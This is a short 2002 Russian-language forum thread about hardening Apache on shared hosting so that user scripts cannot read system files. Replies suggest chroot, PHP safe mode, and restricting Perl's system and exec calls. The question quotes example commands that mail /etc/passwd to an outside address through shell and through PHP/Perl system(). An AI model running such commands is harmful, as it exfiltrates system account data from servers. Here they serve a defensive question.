URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID8
Нить номер: 410
[ Назад ]

Исходное сообщение
"Секюрная настройка Apache для виртуального хостинга?"
Отправлено Andrew , 28-Фев-02 22:47

Ткните носом, есть ли возможность закрыть доступ скриптам к системным файлам например
bash скрипта
#!/bin/sh
mail user@domain.com -s passwd < /etc/passwd
или например
php Или perl скрипта
system("user\@domain.com -s passwd < /etc/passwd");
?

Содержание

RE: Секюрная настройка Apache для виртуального хостинга?,uldus, 11:49 , 01-Мрт-02
- RE: Секюрная настройка Apache для виртуального хостинга?,uldus, 11:56 , 01-Мрт-02

Сообщения в этом обсуждении

"RE: Секюрная настройка Apache для виртуального хостинга?"
Отправлено uldus , 01-Мрт-02 11:49

>Ткните носом, есть ли возможность закрыть
>доступ скриптам к системным
>файлам например
>bash скрипта
>#!/bin/sh
>mail user@domain.com -s passwd < /etc/passwd
>
>или например
>php Или perl скрипта
>system("user\@domain.com -s passwd < /etc/passwd");
>?
для Perl и Shell - Chroot, в PHP есть внутренние средства ограничения области видимости системных файлов (safe mode).

"RE: Секюрная настройка Apache для виртуального хостинга?"
Отправлено uldus , 01-Мрт-02 11:56

>для Perl и Shell - Chroot,
>в PHP есть внутренние средства
>ограничения области видимости системных файлов
>(safe mode).
Кстати, можно запретить в perl выполенение system, `` и других функций с exec, или поставить свои обработчики, которые будут контолировать, что можно запускать, а что нет. perldoc perlrun